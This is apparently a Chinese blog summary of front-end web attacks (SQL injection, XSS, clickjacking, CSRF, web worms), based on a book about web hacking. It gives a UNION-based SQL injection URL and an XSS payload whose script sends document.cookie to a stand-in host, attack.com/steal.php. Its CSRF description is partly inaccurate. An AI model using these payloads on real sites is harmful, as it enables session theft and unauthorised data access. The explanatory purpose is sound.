前端 安全 问题

看了一本书《Web前端黑客技术揭秘》，讲了很多的前端安全性问题，这里总结下常见的！不是挨个讲解，只是讲一下概念。

1、SQL注入攻击

一个例子说明一切：

访问：http://www.demo.com/demo.php?id=1

=> select * from user_table where id=1

访问：http://www.demo.com/demo.php?id=1 union select * from user_table

=> select * from user_table where id=1 union select * from user_table.

2、XSS跨站脚本攻击

举个例子：

访问：http://www.demo.com/demo.php#document.write("<script/src=www.attack.com/alert.js></script>");

alert.js

new Image().src="http://www.attack.com/steal.php?data="+escape(document.cookie);

就是为了获取珍贵的Cookie，还要注意HttpOnly cookie 的溢出泄露。

3、前端页面劫持

分点击劫持、拖放劫持、触屏劫持三种。

这个道理也很简单，就是讲一个需要用户点击或其他操作的页面使用iframe标签引到当前页面，但是其余部分都被遮挡住，然后只暴露出需要用户点击或其他操作的部分，并且引导用户进行操作。从而获得用户客户端的各种数据，利用数据完成一些操作。

4、CSRF跨站请求伪造

CSPR攻击和XSS攻击的不同之处在于它是要用户到一个黑客构建好的攻击网站上，从而被获得Cookie。

5、Web蠕虫问题

蠕虫程序就是利用Web2.0用户只交的交流这一个特点做的。

经典例子：某人发表了一个东西，如果另一个用户发现并点开了。这个蠕虫程序便使用点击人的信息再次发送一条相同信息，依次扩展，指数增长！

用处：对用数据进行恶意操作，拒绝服务攻击，分布式拒绝服务攻击，散播广告，散播网页木马，传播舆情等。

其他：注意同源策略，网络上的信任与不信任，社会工程学的应用。